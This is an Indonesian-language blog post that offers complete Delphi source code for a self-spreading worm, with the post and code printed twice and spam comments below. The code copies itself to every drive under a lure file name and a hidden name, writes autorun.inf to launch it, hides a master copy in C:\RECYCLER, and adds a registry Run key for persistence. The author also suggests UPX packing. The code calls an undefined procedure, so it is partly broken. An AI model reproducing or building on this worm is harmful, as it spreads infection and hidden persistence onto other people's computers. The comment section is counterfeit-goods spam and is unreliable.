lama ga muncul kembali lg gan dengan project worn ane 
okey langsung saja….klo didelphi utk membuat worm berukuran kecil cukup menggunakan Consule Application, dengan Aplikasi konsul worm yang dihasilkan akan berukuran jauh lebih kecil, untuk mempertahankan worm dimemory disini saya menggunakan perulangan repeat until ditambah fungsi sleep utk menghandlenya agar tidak boros memory.. worm ini sangat sederhana dgn membuat penggandaan disetiap drive dgn nama menggunakan teknik sosial enginering A.K.A soceng ^^ dan tentunya jg menggunakan autorun.inf, walaupun saat ini cara tersebut tdk ampuh lg..
utk teknik selanjutnya terserah kamu, gunakan kemampuan yg kamu miliki, saat dicompile ukuranya 47kb, dan saat di compress menggunakan UPX ukuranya jd lebih kecil 25kb (tanpa ikon & resource)..
berikut ini sourcecodenya, gunakan Project Consule Application..
program Project1;
uses
SysUtils,
Windows;
Procedure PesanVirus();
var
txt : TextFile;
begin
// Cek apakah ada pesan virus, jika tidak ada
if FileExists(‘C:\Pesan.txt’)=False then
begin // buat pesan ke drive C:
AssignFile(txt, ‘C:\Pesan.txt’);
ReWrite(txt);
WriteLn(txt, ‘Baca :’);
WriteLn(txt, ‘=======’);
WriteLn(txt, ‘wew perkenalkan saya zer03s’);
WriteLn(txt, ‘mau numpang mejeng disini’);
WriteLn(txt, ‘bolehkan’);
WriteLn(txt, ”);
WriteLn(txt, ‘cekidot!!!’);
WriteLn(txt, ‘assalamualaikom’);
CloseFile(txt);
end;
end;
Procedure Infeksi();
var
Drive: Char;
inf : TextFile;
begin
for Drive := ‘C’ to ‘Z’ do //Infeksi Drive C – Z
begin
try
//Check apakah ada file worm Bugil.exe, jika tdk ada
if (FileExists(Drive+’:\Bugil.exe’)=False)then
begin
//buat worm ke drive dengan nama Bugil.exe
Copyfile(pchar(ParamStr(0)), pchar(Drive+’:\Bugil.exe’), false);
//Setting Attributnya jd normal agar terlihat
FileSetAttr(Drive+’:\Bugil.exe’, FILE_ATTRIBUTE_NORMAL);
end;
//Check apakah ada file virus ~localtmp.exe (Buat Autorun), jika tdk ada
if (FileExists(Drive+’:\~localtmp.exe’)=False)then
begin
//buat virus ke drive dengan nama ~localtmp.exe
Copyfile(pchar(ParamStr(0)), pchar(Drive+’:\~localtmp.exe’), false);
//Setting Attributnya agar tersembunyi
FileSetAttr(Drive+’:\~localtmp.exe’, FILE_ATTRIBUTE_READONLY+FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN);
//Membuat Autorun.inf disetiap drive
FileSetAttr(Drive+’:\Autorun.inf’,FILE_ATTRIBUTE_NORMAL);
AssignFile(inf, Drive+’:\Autorun.inf’);
ReWrite(inf);
WriteLn(inf, ‘[Autorun]‘);
WriteLn(inf, ‘shellexecute=~localtmp.exe’);
CloseFile(inf);
FileSetAttr(Drive+’:\Autorun.inf’,FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
end;
except
end;
end;
end;
begin
//cek apakah sudah ada file induk virus apa belum, jika tdk ada
if FileExists(‘C:\RECYCLER\zer03s.exe’) = False then
begin
// buat file induk di C:\RECYCLER\Sapihost.exe
Copyfile(pchar(ParamStr(0)), pchar(‘C:\RECYCLER\zer03s.exe’), false);
//Setting attribunya menjadi hidden dan system
FileSetAttr(‘C:\RECYCLER\zer03s.exe’, FILE_ATTRIBUTE_READONLY+FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN);
end;
//Cek jika worm yg dijalankan bukan nama file induknya
If ExtractFileName(ParamStr(0)) <> ‘zer03s.exe’ then
begin
//Jalankan diam-diam file induk utama yg ada di C:\RECYCLER\zer03s.exe
WinExec(‘C:\RECYCLER\zer03s.exe’,SW_HIDE);
//Yang bukan file induk akhiri proses, jd yg aktif cuma file induk
FatalExit(0);
FatalExit(1);
end;
//Cek lagi jika file induk yg dijalankan bernama file induk ‘zer03s.exe’ maka
If ExtractFileName(ParamStr(0)) = ‘zer03s.exe’ then
begin
// buat perulangan menggunakan repeat until, proses berulang-ulang
repeat
sleep(30000); //Pause 30 detik = 30000
Pesanworm; //Buat pesan worm
Infeksi; //Penginfeksian
// Membuat startup file induk menggunakan perintah REG ADD
WinExec(‘REG ADD “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “zer03s” /f /t REG_SZ /d “C:\RECYCLER\zer03s.exe”‘,SW_HIDE);
until false;
// dengan menggunakan perulangan maka proses worm akan tetap aktif dimemory
end;
end.// Sekian
terimakasih by admin : h3ykh3nd
okey langsung saja….klo didelphi utk membuat worm berukuran kecil cukup menggunakan Consule Application, dengan Aplikasi konsul worm yang dihasilkan akan berukuran jauh lebih kecil, untuk mempertahankan worm dimemory disini saya menggunakan perulangan repeat until ditambah fungsi sleep utk menghandlenya agar tidak boros memory.. worm ini sangat sederhana dgn membuat penggandaan disetiap drive dgn nama menggunakan teknik sosial enginering A.K.A soceng ^^ dan tentunya jg menggunakan autorun.inf, walaupun saat ini cara tersebut tdk ampuh lg..utk teknik selanjutnya terserah kamu, gunakan kemampuan yg kamu miliki, saat dicompile ukuranya 47kb, dan saat di compress menggunakan UPX ukuranya jd lebih kecil 25kb (tanpa ikon & resource)..
berikut ini sourcecodenya, gunakan Project Consule Application..
program Project1;
uses
SysUtils,
Windows;
Procedure PesanVirus();
var
txt : TextFile;
begin
// Cek apakah ada pesan virus, jika tidak ada
if FileExists(‘C:\Pesan.txt’)=False then
begin // buat pesan ke drive C:
AssignFile(txt, ‘C:\Pesan.txt’);
ReWrite(txt);
WriteLn(txt, ‘Baca :’);
WriteLn(txt, ‘=======’);
WriteLn(txt, ‘wew perkenalkan saya zer03s’);
WriteLn(txt, ‘mau numpang mejeng disini’);
WriteLn(txt, ‘bolehkan’);
WriteLn(txt, ”);
WriteLn(txt, ‘cekidot!!!’);
WriteLn(txt, ‘assalamualaikom’);
CloseFile(txt);
end;
end;
Procedure Infeksi();
var
Drive: Char;
inf : TextFile;
begin
for Drive := ‘C’ to ‘Z’ do //Infeksi Drive C – Z
begin
try
//Check apakah ada file worm Bugil.exe, jika tdk ada
if (FileExists(Drive+’:\Bugil.exe’)=False)then
begin
//buat worm ke drive dengan nama Bugil.exe
Copyfile(pchar(ParamStr(0)), pchar(Drive+’:\Bugil.exe’), false);
//Setting Attributnya jd normal agar terlihat
FileSetAttr(Drive+’:\Bugil.exe’, FILE_ATTRIBUTE_NORMAL);
end;
//Check apakah ada file virus ~localtmp.exe (Buat Autorun), jika tdk ada
if (FileExists(Drive+’:\~localtmp.exe’)=False)then
begin
//buat virus ke drive dengan nama ~localtmp.exe
Copyfile(pchar(ParamStr(0)), pchar(Drive+’:\~localtmp.exe’), false);
//Setting Attributnya agar tersembunyi
FileSetAttr(Drive+’:\~localtmp.exe’, FILE_ATTRIBUTE_READONLY+FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN);
//Membuat Autorun.inf disetiap drive
FileSetAttr(Drive+’:\Autorun.inf’,FILE_ATTRIBUTE_NORMAL);
AssignFile(inf, Drive+’:\Autorun.inf’);
ReWrite(inf);
WriteLn(inf, ‘[Autorun]‘);
WriteLn(inf, ‘shellexecute=~localtmp.exe’);
CloseFile(inf);
FileSetAttr(Drive+’:\Autorun.inf’,FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
end;
except
end;
end;
end;
begin
//cek apakah sudah ada file induk virus apa belum, jika tdk ada
if FileExists(‘C:\RECYCLER\zer03s.exe’) = False then
begin
// buat file induk di C:\RECYCLER\Sapihost.exe
Copyfile(pchar(ParamStr(0)), pchar(‘C:\RECYCLER\zer03s.exe’), false);
//Setting attribunya menjadi hidden dan system
FileSetAttr(‘C:\RECYCLER\zer03s.exe’, FILE_ATTRIBUTE_READONLY+FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN);
end;
//Cek jika worm yg dijalankan bukan nama file induknya
If ExtractFileName(ParamStr(0)) <> ‘zer03s.exe’ then
begin
//Jalankan diam-diam file induk utama yg ada di C:\RECYCLER\zer03s.exe
WinExec(‘C:\RECYCLER\zer03s.exe’,SW_HIDE);
//Yang bukan file induk akhiri proses, jd yg aktif cuma file induk
FatalExit(0);
FatalExit(1);
end;
//Cek lagi jika file induk yg dijalankan bernama file induk ‘zer03s.exe’ maka
If ExtractFileName(ParamStr(0)) = ‘zer03s.exe’ then
begin
// buat perulangan menggunakan repeat until, proses berulang-ulang
repeat
sleep(30000); //Pause 30 detik = 30000
Pesanworm; //Buat pesan worm
Infeksi; //Penginfeksian
// Membuat startup file induk menggunakan perintah REG ADD
WinExec(‘REG ADD “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “zer03s” /f /t REG_SZ /d “C:\RECYCLER\zer03s.exe”‘,SW_HIDE);
until false;
// dengan menggunakan perulangan maka proses worm akan tetap aktif dimemory
end;
end.// Sekian
terimakasih by admin : h3ykh3nd
+ komentar + 2 komentar
2015-10-41leilei
cheap uggs
rolex replica watches
louis vuitton outlet stores
timberland uk
nike air max
coach factory
nike trainers
ed hardy
michael kors handbags
michael kors outlet
ugg boots
air jordan 8
ray bans
louis vuitton outlet
north face outlet
michael kors bags
abercrombie and fitch
oakley vault
christian louboutin outlet
michael kors handbags
cheap jordans
canada goose uk
air jordan shoes
louis vuitton outlet
ugg boots
instyler max
michael kors uk
louis vuitton outlet stores
michael kors handbags
christian louboutin sale
ugg australia
michael kors bags
snapbacks wholesale
michael kors
toms outlet
ghd hair straighteners
toms outlet
michael kors handbags
ralph lauren
michael kors outlet online
I truly like your technique of writing a blog
http://caravank.com/factory/
http://caravank.com/for-sale-in-riyadh/
http://caravank.com/withdrawn-for-sale/
http://caravank.com/withdrawal-rooms/
Posting Komentar
Blog Dofolow , Tapi Tolong jangan nyepam dan ada kata kata yang tidak baik